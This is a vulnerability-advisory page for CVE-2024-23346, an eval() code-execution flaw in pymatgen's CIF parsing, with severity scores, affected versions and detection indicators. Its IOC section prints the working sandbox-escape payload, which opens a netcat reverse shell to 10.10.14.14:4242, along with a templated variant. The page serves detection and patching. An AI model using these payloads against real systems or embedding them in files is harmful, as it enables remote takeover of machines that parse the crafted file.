cbcvebase.
CVE-2024-23346
published 2024-02-21

CVE-2024-23346: Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the…

PriorityP354high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
3.82%
88.7th percentile
Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue.

Affected

6 ranges
VendorProductVersion rangeFixed in
debianpymatgen< pymatgen 2022.11.7+dfsg1-11+deb12u1 (bookworm)pymatgen 2022.11.7+dfsg1-11+deb12u1 (bookworm)
materialsprojectpymatgen< 2024.2.202024.2.20
materialsvirtuallabpymatgen< 2024.2.202024.2.20
pymatgenpymatgen>= 0 < 2022.11.7+dfsg1-11+deb12u12022.11.7+dfsg1-11+deb12u1
pymatgenpymatgen>= 0 < 2024.1.27+dfsg1-62024.1.27+dfsg1-6
pymatgenpymatgen>= 0 < 2024.2.202024.2.20

Detection & IOCsextracted from sources · hover to see the quote

filenameexploit.cif
filenamevuln.cif
command[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+ ["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("busybox nc 10.10.14.14 4242 -e /bin/bash");0,0,0
command[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+ ["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0
path/static/example.cif
other_space_group_magn.transform_BNS_Pp_abc
  • Malicious CIF files exploiting CVE-2024-23346 contain a crafted `_space_group_magn.transform_BNS_Pp_abc` field embedding a Python class-traversal payload to escape the eval() sandbox and execute OS commands.
  • Detect CIF file uploads containing the string `__mro__` or `BuiltinImporter` in the `_space_group_magn.transform_BNS_Pp_abc` field, which is the canonical injection point for this exploit.
  • The exploit audit creation method string `CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit` or `Pymatgen CIF Parser Arbitrary Code Execution Exploit` appears verbatim in malicious CIF files and can be used as a file-content signature.
  • The exploit uses the data block identifier `data_5yOhtAoR` — this static string appears in known PoC CIF files and can serve as a file-content IOC.
  • The vulnerable code path is `JonesFaithfulTransformation.from_transformation_str()` in pymatgen; monitor for pymatgen versions prior to 2024.2.20 parsing externally supplied CIF files.
  • ·The reverse-shell IP and port embedded in the payload (`busybox nc 10.10.14.14 4242`) are attacker-controlled and will vary per campaign; do not rely on these specific values for detection.
  • ·The exploit triggers only when the application calls `CifParser.parse_structures()` (or equivalent) on an attacker-supplied file; the vulnerability is in parsing, not merely file upload.

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv7.8HIGH
vendor_debian9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.